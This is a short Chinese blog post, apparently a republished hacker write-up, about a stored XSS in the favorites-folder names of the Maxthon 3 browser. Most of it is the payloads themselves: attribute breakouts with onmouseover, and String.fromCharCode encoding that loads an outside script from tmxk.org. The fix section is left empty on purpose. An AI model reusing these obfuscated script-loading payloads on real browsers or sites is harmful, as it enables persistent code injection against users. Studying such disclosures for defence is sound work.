遨游浏览器某功能才存在存储型xss。
可致留后门。
一时兴起，挖了一上午，找到了一个漏洞(本人傲游版本v3.3.9.1000)。
没给出exp，不过再花点时间，研究一下遨游的sandbox代码，就能写出来了。
 
遨游浏览器的收藏夹，容许用户建文件夹，我之前试了
 
">'><embed>
没效果，也没看源码就拉到了。今天兴起，看源码，是这样：
 
 
 
于是新建文件夹
 
"> onmouseover='javascript:alert(/xss  by tmxk.org</SPAN>/)'
 
 
 
已经有了，怎么利用呢，
于是测试了容许最大长度，发现没限制。于是测试
发现没效果，
 
"> onmouseover=javascript:write("<script>alert()</script>")
哦这个转意了，于是，改变代码：
 
tmxk.org" onmouseover='javascript:write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,41,60,47,115,99,114,105,112,116,62)'
成功了。于是测试：
 
"> onmouseover=javascript:write("<script/src=//tmxk.org/q.js>")
同样变化代码，没有效果，纠结了一会儿，才明白//网址默认协议与当前页面协议一致，而遨游的属性页是mx://
于是这样写
 
"> onmouseover=javascript:write("<script src=http://tmxk.org/q.js></script>")
变换代码：
 
tmxk.org" onmouseover='javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))'
 www.2cto.com
 
 
 
 
 
 
 
所有测试截图：
 
 
 




 
修复方案：

你懂得，我还得挖掘。
作者 random_